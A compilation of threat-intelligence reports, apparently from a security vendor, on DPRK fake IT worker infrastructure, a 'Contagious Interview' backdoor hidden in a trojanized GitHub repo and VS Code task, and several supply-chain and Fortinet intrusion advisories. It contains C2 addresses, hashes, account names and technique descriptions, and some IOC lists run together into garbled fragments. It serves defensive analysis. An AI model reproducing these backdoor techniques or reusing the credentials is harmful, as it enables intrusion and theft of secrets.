Treasury Targets DPRK Malicious Cyber and Illicit IT Worker Activities – U.S. Department of the Treasury, June 2026 – https://home.treasury.gov/news/press-releases/jy1498
Treasury Targets IT Worker Network Generating Revenue for DPRK Weapons Programs – U.S. Department of the Treasury, June 2026 – https://home.treasury.gov/news/press-releases/jy2790
DEF CON 33 - Blurred Lines: Evolving Tactics of North Korean Cyber Threat Actors - Seongsu Park – October 2025 –
Kim Jong Un labels South Korea as ‘No. 1 hostile country’ – The Chosun Daily, January 2024 – https://www.chosun.com/english/north-korea-en/2024/01/16/NZ2TGZIDRJDG3MYB6Z5ZUXFDYM/
‘As close as lips and teeth’: The highs and lows of China-North Korea ties – Al Jazeera – https://www.aljazeera.com/news/2026/6/9/as-close-as-lips-and-teeth-the-highs-and-lows-of-china-north-korea-ties
Inter-Korean Rivalry in the Cyber Domain: The North Korean Cyber Threat in the “Sŏn’gun” Era – Georgetown University Press, 2016 – https://www.jstor.org/stable/26395976
APT38 | New North Korean Regime-Backed Threat Group | Google Cloud Blog – https://cloud.google.com/blog/topics/threat-intelligence/apt38-details-on-new-north-korean-regime-backed-threat-group?hl=en
At North Korean hub in China, uncertainty looms for Pyongyang-backed businesses | Reuters – https://www.reuters.com/article/world/at-north-korean-hub-in-china-uncertainty-looms-for-pyongyang-backed-businesses-idUSKBN1DV3S1/
DPRK Fake IT Workers: Inside Their Evolving Network Infrastructure - Pinebar research Center – July 2026 – .//research/dprk-fake-it-workers-inside-their-evolving-network-infrastructure
Russia issued over 36K visas to North Koreans in 2025, almost all for education | NK News – April 2026 – https://www.nknews.org/2026/04/russia-issued-over-36k-visas-to-north-koreans-in-2025-almost-all-for-education/
S/RES/2375 2017 | Security Council – https://main.un.org/securitycouncil/en/s/res/2375-%282017%29
The Incredible Rise of North Korea’s Hacking Army | The New Yorker – April 2021 – ../web.archive.org/web/20210903030018/https://www.newyorker.com/magazine/2021/04/26/the-incredible-rise-of-north-koreas-hacking-army
The Strategic Partnership Agreement between Russia and North Korea - Georgian Foundation for Strategic and International Studies (Rondeli Foundation) – https://gfsis.org/en/the-strategic-partnership-agreement-between-russia-and-north-korea/
국정원 “DDoS 공격 비상대응체제 가동중” - 정책뉴스 | 뉴스 | 대한민국 정책브리핑 – https://www.korea.kr/news/policyNewsView.do?newsId=148673043
Russia–North Korea Military Cooperation in Response to China’s Tactical Ambiguity | Asia Society – June 2026 – https://asiasociety.org/policy-institute/russia-north-korea-military-cooperation-response-chinas-tactical-ambiguity
Thread on the leak of North Korean IT workers’ email addresses – @SttyK, August 2025
The Lazarus Constellation – Lexfo, February 2020 ../blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf
Hudson Rock – Infostealer Intelligence Solutions https://www.hudsonrock.com/
ANNEX 1 - North Korean university acronyms found on stealer logs and leaks
ANNEX 2 - Overlap between fake IT workers and DPRK offensive campaigns
Following a recent assessment of multiple events linked to North Korea, we wanted to bring our findings together in one place. This article examines three investigations into past events that were not attributed to the DPRK, as well as legitimate structures being used for illegitimate activities.
The compromise of partners or employers is not new, and DPRK IT workers have used this approach even within the cybercrime sector, as the first investigation into FakeCalls shows. This is why, as an analyst, I do not draw a hard line between cybercrime and state actors: the two can work together, while cybercrime groups can also be infiltrated, influenced or redirected by a state.
This research is based on passive analysis of publicly available data.
We recently observed a stealer log leak involving an actor linked to the DPRK, nicknamed “Bismarck.” The actor used two IP addresses that overlap with indicators of compromise (IOCs) documented by Check Point Research in its analysis of FakeCalls, an Android banking trojan targeting South Korea. Because we had already clustered this threat actor and linked him to the North Korean fake IT worker environment, we assess that these attacks are likely attributable to the DPRK.
This actor's data leaked on December 22, 2023, and the article from Check Point Research was published on March 14, 2023, which fall within a similar timeframe.
Compared with other actors linked to the DPRK, this actor consumed a high volume of North Korean state-owned news, including DPRKdaily, uriminzokkiri and kcnawatch. He was also observed administering multiple gambling-related websites (see Annex 1) that may have been used to launder money. We found autofill fields containing 코인거래 주의사항, meaning “Cryptocurrency Trading Precautions,” as well as operational chats between some of “Bismarck's” associates.
The associates appear to have been suspicious of “Bismarck.” After these messages, one associate wanted to formalize the relationship with a contract and appeared aware of the risks involved. The circumstances of their initial contact remain unclear.
They can also modify the “RTP” (Return to Player) rate, the theoretical percentage of money wagered that is returned to players. In this case, they claim that it can be modified at any time.
Our reconstruction and sequencing may be imperfect, but the evidence suggests that the actors organized themselves across multiple countries to establish several gambling businesses. The casinos do not appear to be properly regulated, and the games are copies of legitimate titles from other publishers. Research into gitslotpark[.]com (see Annex 1) identified a lawsuit filed in Virginia, United States, by Pragmatic Play concerning copies of its games. This also aligns with chat excerpts identified through Google Translate.

The lawsuit also contained the name “E. Vasilyevich,” which overlaps with a name found in Bismarck's autofill data.
We assess that DPRK actors may have reused IP addresses from the gambling operation because the domains were purchased by the associates rather than by “Bismarck” or other North Korean operatives. We believe that a team operated behind "Bismarck" during the operation, given the size of the infrastructure, as we understand that "Bismarck" was the system administrator and developer for this operation.
Based on the IPs found in the metadata of "Bismarck's" session cookies, we were able to see that he established connections from a mobile ISP in Moscow, Russia, which may indicate that he conducted his operations from Moscow.
The metadata comes mainly from DPRKtoday, a North Korean news website widely used by overseas workers. It also serves as a pivot point that we use to track threat actors laterally through stealer log data.

We assessed a DPRK-related actor, identified in a stealer log, who appeared to work as a manager. Two IP addresses stored in his password vault were associated with the delivery of Emotet, modular malware first observed in 2014. Emotet began as a banking trojan before evolving into a loader used to deliver other payloads. We assess with moderate confidence that the manager used the two IPs listed below to deploy Emotet.
The credentials were stolen from the manager's WinSCP vault in 2021. Cross-referencing the history of 160.16.143[.]191, this IP began being used as a loader in early 2022, according to VirusTotal history.

One notable aspect of this profile is that the entire system is in Japanese. This is not the first time we have observed this pattern. Based on his notes, which were written partly in Japanese and partly in Korean, this cell appears to have targeted Japan exclusively. The notes described missions carried out by the team in 2021.

Given the UTC+8 time zone, we assess that he could be located in North Korea.
During our research, we identified multiple universities connected to the fake IT worker operation. The most significant in our assessment were Kim Chaek University of Technology, Jinung Institute of IT Development at Kim Il Sung University, and PYITC, which we attribute with medium confidence to the Pyongyang Information Technology Center.
These were often North Korean universities. In the cases we assessed, the activity appeared to involve fake IT workers operating from within these institutions rather than students. We observed a naming convention of <university acronym>-<number>, with numbering beginning at 001. Using this convention, we ran a bulk lookup on Hudson Rock from <university acronym>-001 to <university acronym>-999, which provided additional context on activity within these institutions.
For the building reconstruction/GEOINT analysis, we are unsure whether the machine naming convention refers to a base or to a named physical location. For this analysis, we assumed that it referred to a named location.

With low confidence, we reconstructed a small part of Kim Chaek University of Technology using the naming convention found on computers within the assessed cluster. These machines were marked internally as “units” and used tags such as “4-2-205,” which could refer to “Building/Floor/Room.” We see this pattern frequently in stealer logs and assess that these machines are likely not portable. Across different units, only the first digit changed, leading us to assess that it may identify the building. Our goal was to cross-reference these identifiers with satellite imagery to determine whether they reveal additional capabilities. The methodology is outlined below.
To do this, we can count the windows to estimate the number of floors and exclude buildings with fewer than two floors, narrowing the possible locations. We were unsure whether the area marked in blue formed part of the campus.

Based on the data observed, the most frequently represented fake IT worker teams from this university were 41/42/43 KUT and several sub-teams. We understand the hierarchy to be: KUT → Department → Team.
We found limited information on their network infrastructure, but assess that they are probably using the 192.168.142.XXX/24 subnet. Within this infrastructure, we observed connections to the private IP address 192.168.142[.]122:80, which serves a developer management system.
The Jinung Institute of IT Development appears to be less well documented than the other universities. However, the Kim Il Sung University website briefly references the institute and its activities as a university unit.

We initially clustered a group of IT workers using the naming pattern UnivJN-<number>. One individual stated that he was from “Jinung” and part of a team named JN+<number>. The teams identified as JN1 and JN2 appear to consist mainly of developers.
To identify the exact site, we referred to a 38 North article that identified “Jinung solar panel manufacturing.” Assuming the units are grouped together, we examined the area around that facility using “3-4-XX” as a reference.

One assessed profile used a 10-character password resembling a Chinese student ID. We do not know whether they adopted the same naming convention as Chinese universities, although it is plausible.
We are unsure whether PYITC refers to the Pyongyang Information Technology Center, as the acronym appears only within the IT worker teams we assessed. However, we can say with high confidence that the entity is linked to a North Korean university because we observed the same patterns documented in the previous cases. The infrastructure we reconstructed makes extensive use of an HFS solution, probably Rejetto, across PYITC teams (see Annex 2), with “Student Management” appearing as a title.
We observed a pattern in fake IT worker usernames consisting of three digits in the format “3-X-X.” This appears more likely to be an organizational or military naming convention than a building identifier and differs from the machine-name patterns assessed earlier.
Across both networks, we observed the same dashboard name on hosts ending in “.8,” which may reflect an internal convention used by this entity.
The role of students remains unclear. We observed indications that students may participate in the fake IT worker operation, and this is the first time we have encountered the term “student” rather than “units.”
By cross-referencing sources including stealer logs and the ZachXBT leak, we developed the following understanding of the “Base” system's structure.
Five known bases have been identified, although their locations are not publicly known. A “base” is described as a location where workers can access the internet. Connectivity is provided in two ways: a wired fiber-optic connection, which is stable but slow, or what they call “Wi-Fi,” which is actually a router with a SIM card using the cellular network. The latter is faster but less stable and can support three to five people at a time.
A dedicated support team handles requests for new routers and other technical issues. Workers can move between bases depending on decisions made by the “base boss” and the individual team member. However, they are not required to work from these bases; some companies and universities in North Korea already have internet access.

Understanding how cybercrime and state-linked activity intersect is critical to staying ahead of emerging threats. Pinebar can help you understand the threats facing your organization and turn intelligence into meaningful action. Contact our team for more information.
Hudson rock for the stealer logs
// FakeCalls, Casino part
https://research.checkpoint.com/2023/south-korean-android-banking-menace-fakecalls/
// Emotet part
../github.com/pr0xylife/Emotet/blob/main/e4_emotet_18.03.2022.txt
// Jinung Institute of IT Development (Kim Il Sung university)
// Base
https://investigation.io/dprk-itw-breach/ password:123456
The translation from Korean to English has been made by AI
ANNEX 1 – Gambling administration Link
ANNEX 2 – PYITC network
ANNEX 3 – Bonus – North Korean word list found in an autofill
Translated with AI
This report is a follow-up to our previous research on the internal network of DPRK IT workers. Using stealer logs, we expand our understanding of these threat actors’ internal infrastructure, much of which appears to be located in North Korea. This includes newly identified network segments, further insight into their organizational structure and new clusters within the previously documented offensive infrastructure.
This research is based on the passive analysis of publicly available data.
.png)
We divided the infrastructure in 3 parts
This report is divided into two parts. The first examines the public-facing infrastructure, while the second presents relevant observations on clusters identified within either the offensive ecosystem or the fake IT worker operation.
Following our previous article on this infrastructure, we observed that actors linked to the DPRK fake IT worker cluster had changed several parts of their infrastructure. However, the infrastructure associated with Skyfreight Limited remained unchanged.
Considering all known locations and the context gathered before the infrastructure shift, we can trace an apparent path from North Korea to western Russia.

Over time, we observed that their primary targets appear to be the United States and Japan. To support their operations, they use VPNs to obtain exit nodes in these countries. DPRK IT workers use many commercial VPN services, so we used this pattern as a pivot point when analyzing stealer logs.

Astrill VPN may appeal to malicious actors because its servers are difficult for researchers to fingerprint. We therefore relied primarily on IP addresses identified by Spur and OTX to find additional profiles. Fake IT workers appear to share some exit nodes with offensive teams. Researchers can therefore use IP addresses associated with previous campaigns as pivot points in OTX to identify potential overlaps. The keyword “Lazarus” also produced useful results in this context.
Based on our observations, Mullvad is the second most commonly used VPN provider among fake IT workers. Its infrastructure is relatively easy to identify because it uses dedicated, named ranges.
We then used Hudson Rock to identify profiles matching known patterns associated with fake IT workers or North Korean operators.
One distinction between Cluster A and Cluster B is how they conceal their public IP addresses. Cluster A appears to take greater care to protect the source IP addresses of its command-and-control infrastructure. Cluster B takes the opposite approach and makes less effort to conceal them. For example, 175.45.178[.]222 has been attributed to an attacker team for more than five years, yet the team continues to reuse it, sometimes behind a single proxy and sometimes without a VPN or proxy.

As part of the C2 operations, we observed a high volume of DNS requests sent through MikroTik routers around the world.
Following the leak published by ZachXBT (password: 123456), we identified several overlaps with our findings. Before the leak, we had identified only acronyms such as “HMB,” which we can now link to “HamBuk”; “RS,” which refers to “RedStar”; and “S.E.C.,” which refers to the Second Economy Committee. We would not have been able to resolve these terms without the leaked information. Many other terms remain unresolved. Even when teams do not use acronyms, some rely on North Korean cultural references that provide little indication of their actual purpose. The internal infrastructure suggests that multiple sectors are involved in the fake IT worker scheme.
During our infrastructure assessment, we were unable to identify a gateway until we found a stealer log belonging to a DPRK IT worker who was configuring a Huawei HiLink router. The worker accessed the router through 192.168.8[.]1 on a network used by Team 313.

As we could not observe any other configuration tasks on the other routers and never saw any other internal IPs ending in "1," we assess with low confidence that they use the first usable address (192.168.*.1/24) as a convention for their gateway addresses. Using the first usable address is a common networking convention, although some networks use the last usable address instead.
We attributed “RB” to “Ryonbong,” a sanctioned North Korean company linked to the defense sector. From an infrastructure perspective, RB appears to perform a support function by providing and collecting administrative reports from DPRK employees.
On the “RB proxy,” we identified the URL hxxp://192.168.109[.]2/call, which we linked to a WebRTC call server on the same network. The actors appear to use two methods for internal communication: this server and a separate tool called “CallPC,” which we identified across several other networks.

We also found references to “KUT” and Ryonbong in several stealer log profiles. Based on the subdomain and the contact email kut[@]star-co[.]net[.]kp, we linked KUT to Kim Chaek University of Technology.

A stealer log contained references to 13 teams, ranging from 41-KUT and 42-KUT to HQ and Ryonbong. The log did not contain the teams’ private IP addresses. We do not yet know what this structure represents. Although the teams are linked to the university, the naming convention does not appear to correspond to university classes.

In our earlier research, we assessed the offensive infrastructure described in this article. We have since added a new cluster, labeled “PUG,” although we have not determined what the acronym means. We still do not know where this infrastructure is located or what its purpose is. One user is associated with a team named “Yuhang.” Yuhang is also the name of a district in Hangzhou, but this is not a sufficiently strong indicator to support attribution at this stage.

Informational part: We noticed that a server with the following address 192.168.143[.]66 host public YouTube videos to learn English.
Hudson rock for the stealer logs
../blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf
https://investigation.io/dprk-itw-breach/ (password: 123456)
Pinebar’s research team tracked a DPRK-linked cluster of individuals running the “Contagious Interview” campaign, operating from DPRK and China. Posing as recruiters on LinkedIn, WhatsApp, and Discord, the operators lure job-seeking developers into fake technical interviews and trick them into running malicious code.
This article explains how they operate and includes a backdoor analysis of a GitHub repository used in their fake interview workflow.
At the beginning of this year, we were able to gather contracts shared over LinkedIn and WhatsApp with potential collaborators who consented to open a laptop farm or individually give DPRK actors access to their laptop and identity to perform a range of tasks.



Following a contract signed between two of the parties, we observed that the actors also used the identity and machines of the collaborators to infiltrate CodeMentor (codementor[.]io), conduct 1:1 sessions with developers, and apply to freelance positions as a developer.
Once the contract was signed, we observed that they ran tests with .bat files whose contents we could not see. We assess with low confidence that these specific commands were linked to interviews conducted by them.

Nircmd is a command-line utility from NirSoft and is currently being used by DPRK-related actors to make victims execute .bat files on their system during coding interviews. As we could not read the contents of the .bat files, we do not know what those files do once executed on the system.
We can note that they mainly used three flags related to Nircmd: exec, win, and hide.
We think that the DPRK actor uses the combination of both flags, win and hide, either because they misunderstand the command utility or to evade detection based on Nircmd + exec + hide. In some cases, it should be Nircmd + exec + win + hide, so the analyst has to adapt the detection rule. You can find detection logic at the end of this article.
Over time, we observed that DPRK actors ran a scamming scheme by hiring external collaborators in Iran to act as interviewers. They mainly used VPS, residential proxies, and VPNs located in the region they were targeting. In fake interviews, they specifically targeted people related to the blockchain sector or developers who might have access to crypto companies.
For example, when they targeted Japan, they mainly connected through M247 Japanese ranges, connected to a VPS, or used an Astrill VPN node with a Japanese IP address.
Astrill VPN allows malicious actors to do port forwarding over their C2 to hide their servers behind Astrill VPN services.

This is the main reason DPRK actors use Astrill VPN for their malicious campaigns. It also helps because some of their operators are located within China, giving them easier access to the internet outside China or North Korea without being restricted.
They mainly pay for this service with stolen credit cards.
In our previous research, we observed with medium confidence that North Korea had direct connections with Chinese ISPs such as ZTE, which could probably give them Chinese IPs instead of North Korean IPs. Even if the connection we found is not active, it is still useful for infrastructure analysis.

We also saw in a research article from the GitLab Threat Intelligence team that some North Korean IT worker cells can operate within Chinese universities at joint research centre facilities used as cover for malicious activity outside North Korea. That suggests their source IPs may originate from China as well.
As we apply a specific marker to threats against the Netherlands, we observed that a GitHub repository named Ajuna-solution impersonated a Dutch company named Ajuna-network to likely spread malware and compromise interviewees during fake coding interviews led by fake recruiters linked to DPRK. This campaign has been named Contagious Interview and is already well documented. This time, we decided to give an overview of what we could see from this campaign.
The entirety of this GitHub repository was trojanized, and this analysis is broken down into multiple parts that we found relevant:

To launch the application, the user must perform an npm install, which triggers a prepare step that starts a Node server as a background task compatible with Windows and Linux. After that, it launches server.js, which enables the backdoor described below.
Once we open “routes/api/auth.js” on the repository

The code appears legitimate, but it uses a common technique to trick users by placing 721 spaces after module.exports = router; and appending obfuscated malicious code. It was probably generated using the obfuscator[.]io engine, based on structural patterns such as identifiers that start with _0x followed by hexadecimal digits, and a custom decoder that does not use native atob to decode strings but instead uses a custom base64 function based on a non-standard alphabet with a lowercase-first order.

Once de-obfuscated, we can identify the backdoor logic as six distinct parts.


This first reconnaissance stage gathers the hostname and the operating system, including the kernel version and platform. The IPv4 family is used only as a filtering criterion to select the right interface and exclude internal interfaces and null MAC addresses. The public IP address does not appear to be collected. Only the MAC address seems to be used as a stable machine identifier.

Within sendRequest(), the collected data is serialized with JSON.stringify and passed as URL parameters, along with the entire process environment (process.env). This means it can steal API keys, tokens, and other secrets.
We also noted that the actor left a marker in the tid field: now it time to get everything. It is likely used to identify or reroute the data within their C2.

Once the base64 is decoded we can now know the C2 and the endpoint behind these communications hxxp://138.201.128[.]169:1224/api/checkStatus.
We can now know that the structure follow this patterns <IP>:1224/api/<Value>
We see that the server is hosted at Hetzner a German VPS provider, we can also see from abuseipdb that this same IP has been reported 1 year ago as the sender of 1200+ phishing emails that can indicate an infrastructure reuse but we can’t confirm it.

The C2 response is parsed as JSON, and if the field status is equal to error, this signals that the message field carries a command that is passed to eval().
The interesting part here is that it uses the error message to catch a condition, which is unusual.

For session handling, the C2 returns an identifier that is stored in SysID, which can give the attacker a tracking ID for each infected host.

On load, the implant runs getSystemInfo() and store the result into s, the data is sent to the C2 without any external trigger. A beacon is sent every 5 seconds and maintains a channel for the C2 to execute commands remotely. If the initialization fails, the error is logged and the process exits with an exit code of 1.

We would like to note that Axios has been called without being used on this project and is installed via NPM, this remains suspicious even if version 1.14.0 has not been impacted by the Axios supply chain attack. According to Google threat intelligence group the following version were compromised 1.14.1 and 0.30.4. One version after the one that was installed.

If you open the project with. vscode it will automatically execute commands hidden by 564 spaces on the “env” task.

Once executed by tasks.json, powershell will use the “-Command” flag + the command within the task, it would appear like this on windows:
“<Absolute path\Powershell.exe> -Command <Commandline in the task>”

They made the execution of these commandlines possible on OSX, Linux and Windows. Once executed it create a. vscode folder in “C:\Users\%USERNAME%\”, install node.js, pull and execute “env.npl” which is the exact same backdoor that we analyzed on “routes/api/auth.js”.

Based on the collected events, we can partially reconstruct what happened during these interviews. The fake interviewer asked the candidate to install the dependencies of the project with npm install. If the candidate did not want to do it, the interviewer would ask them to open the project in VS Code. That action would trigger the backdoor due to the env task located in .vscode/tasks.json.
This is a compromise technique likely combined with social engineering, where the fake interviewer pushes the candidate to perform actions that look benign but in fact trigger the attacker’s backdoor.
If you are targeted by DPRK-related actors, we recommend that organizations use Suricata rules over raw network logs, as North Korean campaigns often reuse the same techniques and malware.
As the Contagious Interview campaign is a human-factor problem, we recommend raising employee awareness around fake interviews, because the use of social engineering makes detection harder.
I use Yara here because this is simpler to document and I just want to show the logic of the rule.
Hudson rock for the stealer logs (I used it to gather PowerShell commands and contracts only)
https://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/
https://cloud.google.com/blog/topics/threat-intelligence/north-korea-threat-actor-targets-axios-npm-package
If your team wants help investigating advanced threat activity, improving detection for social engineering-led intrusion chains, or strengthening defenses against campaigns like Contagious Interview, contact Pinebar to speak with our experts.
A software supply chain attack targeting the market intelligence platform Klue resulted in unauthorized access to customer integrations and subsequent data exfiltration from downstream SaaS applications, including CRM systems.
The intrusion began when a threat actor compromised Klue's backend environment and introduced malicious code designed to harvest OAuth tokens used by customer integrations. These tokens were then used to access connected third-party services and extract data directly from customer environments.
One of the impacted organizations includes Huntress, along with other Klue customers. The exposed data primarily consisted of CRM and sales-related information, with no indication of compromise to product infrastructure, engineering systems, threat telemetry, payment data, or passwords.
The incident impacted organizations using Klue integrations with the following third-party services:
Scope of impact:
The intrusion originated when a long-unused but still active credential associated with Klue was used to gain initial access to its backend systems. The threat actor used this foothold to deploy malicious code into integration workflows, specifically targeting mechanisms responsible for handling customer OAuth tokens. These tokens, which are used to authorize connections between Klue and third-party SaaS platforms, were covertly harvested as they were processed.
Once the attacker obtained valid OAuth credentials, they pivoted into downstream customer environments and used the stolen tokens to authenticate directly against integrated services. This enabled them to perform API-driven queries against connected systems, including CRM platforms such as Salesforce, where they systematically extracted records through standard query endpoints. The activity was characterized by automated data retrieval at scale, consistent with bulk CRM data enumeration rather than interactive user behavior.
From there, the attacker used the compromised integrations to access additional connected services, including sales and collaboration platforms, and exfiltrated structured business data such as contacts, pricing information, sales communications, and internal notes. The attack ultimately demonstrated a chained supply chain compromise, where a single upstream integration failure enabled cascading unauthorized access across multiple downstream environments.
/services/data/v59.0/query/ endpoints"5238")Python-urllib/3.12Python-urllib/3.14Organizations potentially impacted by similar integrations should take the following actions:
/services/data/v59.0/query/138.226.246[.]94212.86.125[.]24213.111.148[.]9094.154.32[.]160(Updated June 23)
A large-scale, ongoing intrusion campaign targeting Fortinet infrastructure has been observed impacting internet-facing firewalls and VPN gateways worldwide. The operation, widely referred to as “FortiBleed,” primarily and definitely involves credential reuse, stealing, and brute force. According to Fortinet, “Based on our initial analysis, we believe the activity involves threat actors reusing credentials from previous incidents and employing brute-force techniques against devices with weak password hygiene and no multi-factor authentication (MFA).” Other researchers suggest the campaign may also involve the exploitation of a number of recent vulnerabilities affecting Fortinet products to achieve initial access and maintain persistence within enterprise environments, but no clear link has been established to the FortiBleed campaign.
The campaign is notable for its scale and automation. Attackers are not relying on a single exploit path; instead, they use a continuous cycle where stolen credentials, brute-force attempts, and intercepted authentication data are reused to expand access across thousands of organizations globally. This has resulted in widespread compromise affecting tens of thousands of devices across more than 190 countries, including critical infrastructure and major multinational enterprises.
Organizations can check whether their company has been exposed through the FortiBleed lookup tool provided by Hudson Rock, and affected customers are being contacted directly as part of ongoing coordinated disclosure efforts to support remediation and incident response.
The following systems and applications are impacted or actively targeted. Vulnerabilities listed may have contributed to spreading FortiBleed's reach, but this is unconfirmed and the list is not exhaustive. In any case, it is strongly recommended to make sure these vulnerabilities have been patched.
The intrusion chain typically begins with large-scale internet scanning to identify exposed Fortinet devices. Once discovered, attackers attempt authentication using vast datasets of previously leaked credentials, many of which originate from infostealer malware infections or older breaches. This credential-stuffing phase alone accounts for billions of login attempts, indicating a highly automated infrastructure designed for continuous exploitation.
When credentials are insufficient, attackers escalate by attempting brute-force authentication or, possibly in a subset of cases, exploiting known vulnerabilities in Fortinet products. Recently patched flaws - such as authentication bypass and remote command execution vulnerabilities in FortiSandbox and FortiClient EMS - are actively being weaponized in the wild, though again, there is no definitive link to FortiBleed. Some exploit attempts appear to be rapidly generated or AI-assisted, although not all are immediately functional.
A particularly concerning aspect of this campaign is the interception of SSL VPN authentication data. Attackers capture authentication material during login sessions and then crack it offline using GPU-accelerated systems. Once valid access is obtained, compromised devices are used as monitoring points inside enterprise perimeters, allowing attackers to observe network traffic and harvest additional credentials.
Post-exploitation activity typically involves persistence within VPN and firewall management interfaces, followed by lateral movement into internal systems such as Active Directory. In addition to building a catalogue of compromised organizations intended to be sold, this enables the attackers to escalate privileges, move across internal segments, and extract sensitive data. In several documented cases, organizations experienced full network compromise and data exfiltration, including entities in critical infrastructure and defense-related sectors.
Organizations should immediately implement the following defensive measures:
Accounts present on Fortinet devices:
Credentials associated with FortiBleed include default accounts as well as those of indeterminate origin - possibly used by MSPs to manage deployments, possibly created for persistence by campaign operators - like adminin, fgtsecure and many others. A small set of passwords appears across many unrelated brands and localities. For a more complete overview of this aspect of the campaign and in the interest of not re-publicizing possibly valid credentials in an easily scrapable format, have a look at CloudSEK's analysis of the open directory which was accidentally left exposed by FortiBleed operators.
IP addresses:
A sophisticated supply chain attack has compromised official DAEMON Tools installers, distributing malware signed with valid digital certificates since April 8, 2026. Discovered by Kaspersky, the incident involves trojanized versions of the software that activate an implant upon execution, enabling targeted malware delivery to a highly selective subset of victims globally. The attack, still active at time of writing, uses legitimate software distribution channels to bypass initial security controls, demonstrating a high degree of operational security by the threat actors.
12.5.0.2421 to 12.5.0.2434.DTHelper.exe, DiscSoftBusServiceLite.exe, and DTShellHlp.exe. These files retain valid digital signatures belonging to the original developers, which helps evade signature-based detection.env-check.daemontools[.]cc (registered on March 27, 2026) to receive shell commands that are subsequently executed via cmd.exe.envchk.exe: A .NET executable designed for extensive system information collection.cdg.exe and cdg.tmp: cdg.exe acts as a shellcode loader that decrypts and executes cdg.tmp, a minimalist backdoor capable of downloading files, running shell commands, and executing shellcode in memory.notepad.exe and conhost.exe. This advanced backdoor indicates a tailored, high-value targeting strategy rather than indiscriminate mass infection.Infected DAEMON Tools Lite installers
9ccd769624de98eeeb12714ff1707ec4f5bf196d (12.5.0.2421)
50d47adb6dd45215c7cb4c68bae28b129ca09645 (12.5.0.2422)
0c1d3da9c7a651ba40b40e12d48ebd32b3f31820 (12.5.0.2423)
28b72576d67ae21d9587d782942628ea46dcc870 (12.5.0.2424)
46b90bf370e60d61075d3472828fdc0b85ab0492 (12.5.0.2430)
6325179f442e5b1a716580cd70dea644ac9ecd18 (12.5.0.2431)
bd8fbb5e6842df8683163adbd6a36136164eac58 (12.5.0.2433)
15ed5c3384e12fe4314ad6edbd1dcccf5ac1ee29 (12.5.0.2434)Modified DiscSoftBusServiceLite.exe
524d2d92909eef80c406e87a0fc37d7bb4dadc14
427f1728682ebc7ffe3300fef67d0e3cb6b62948
8e7eb0f5ac60dd3b4a9474d2544348c3bda48045
00e2df8f42d14072e4385e500d4669ec783aa517
aea55e42c4436236278e5692d3dcbcbe5fe6ce0b
0456e2f5f56ec8ed16078941248e7cbba9f1c8eb
9a09ad7b7e9ff7a465aa1150541e231189911afb
8d435918d304fc38d54b104a13f2e33e8e598c82
64462f751788f529c1eb09023b26a47792ecdc54C:\Windows\Temp\envchk.exe
2d4eb55b01f59c62c6de9aacba9b47267d398fe4C:\Windows\Temp\cdg.exe
C:\Windows\Temp\imp.tmp
C:\Windows\Temp\piyu.exe
9dbfc23ebf36b3c0b56d2f93116abb32656c42e4
295ce86226b933e7262c2ce4b36bdd6c389aaaefC2
env-check.daemontools[.]cc
38.180.107[.]76env-check.daemontools[.]cc.DTHelper.exe, DiscSoftBusServiceLite.exe, DTShellHlp.exe) and associated payloads (envchk.exe, cdg.exe, cdg.tmp).The Cyber Fusion Center (CFC) is monitoring the situation and will issue advisory updates as needed. A threat hunting campaign will be conducted to identify activity related to this attack.
A sophisticated supply chain attack, dubbed "Mini Shai Hulud" has been attributed to the threat actor group TeamPCP. This operation involves the compromise of SAP-related npm packages through the injection of malicious preinstall scripts. The attack aims to harvest developer and CI/CD secrets from platforms such as GitHub, npm, and major cloud providers, with exfiltration occurring via attacker-controlled GitHub repositories.
The campaign has expanded beyond the initial SAP package ecosystem to compromise high-profile packages in the PyPI (lightning aka PyTorch Lightning) and npm (intercom-client) registries. The threat actors have shifted tactics to use automated CI/CD workflows and compromised maintainer accounts to distribute malicious versions, indicating a highly coordinated and automated propagation strategy.
The attack targets specific npm packages within the SAP ecosystem, including:
@cap-js/sqlite - v2.2.2@cap-js/postgres - v2.2.2@cap-js/db-service - v2.10.1mbt - v1.2.48These packages have been modified to include malicious preinstall scripts that execute during the npm install process.
lightning (PyTorch Lightning) versions 2.6.2 and 2.6.3intercom-client version 7.0.4The attack begins with the execution of a setup.mjs script, which downloads the Bun runtime and executes an obfuscated payload (execution.js). This payload acts as a credential stealer and propagation framework, targeting developer environments and CI/CD pipelines. It collects sensitive data, including:
Exfiltration is conducted via public GitHub repositories using encrypted payloads. The malware includes logic to propagate to additional repositories and package distributions. Notably, the operation employs a system check to terminate if the compromised machine is configured for the Russian language, ensuring no data is exfiltrated from Russian-speaking systems.
The attack also introduces browser credential theft capabilities, targeting multiple browsers such as Chrome, Safari, Edge, Brave, and Chromium.
lightning package includes a hidden _runtime directory containing a downloader and an obfuscated JavaScript payload. A Python script (start.py) automatically executes upon module import, downloading the Bun runtime and running an 11 MB obfuscated payload (router_runtime.js) designed for full credential theft.postinstall hook into the package.json file, increments the patch version number, and repacks the .tgz tarballs. If a developer inadvertently publishes these tampered packages, the malware propagates to downstream systems.Security teams should take the following steps to mitigate the impact of this attack:
setup.mjs, execution.js).lightning versions 2.6.2 and 2.6.3, as well as intercom-client version 7.0.4. Remove these packages from all developer systems and CI/CD caches if already installed.lightning 2.6.1 and/or intercom-client 7.0.3 at time of writing to restore functionality without the malicious payload.The Cyber Fusion Center (CFC) continues to actively monitor the situation and will issue advisory updates as needed. A threat hunting campaign regarding the above activity will be conducted.
This is not a story about a novel exploit chain or a nation-state implant. There is no zero-day in this Incident Response engagement, no supply chain compromise, no sandbox escape. This is a story about a FortiGate admin panel on the internet, an account that should have been disabled two years ago, a service account that should never have been Domain Admin, and a SQL server that somehow never got the EDR agent.
None of these are new problems. All of them are on every hardening checklist ever written. Together, they gave INC Ransomware operators everything they needed to exfiltrate about 400 gigabytes of business data and detonate ransomware across the environment in under 48 hours.
We are publishing this case not because it is unusual, but because it is not. The same combination of third-party access sprawl, stale accounts, over-privileged service accounts, and incomplete security tooling exists in most environments we assess. The attackers did not need to be clever. They just needed the basics to be broken.
Year after year, the two dominant initial access vectors in ransomware incidents remain weak or stolen credentials and unpatched vulnerabilities. This case is a textbook example of the first. And once inside, the attackers did exactly what we see in every engagement: they searched for unmanaged assets, systems outside the security stack's visibility, to stage their operations. The SQL server without EDR became the exfiltration platform. None of this required sophistication.
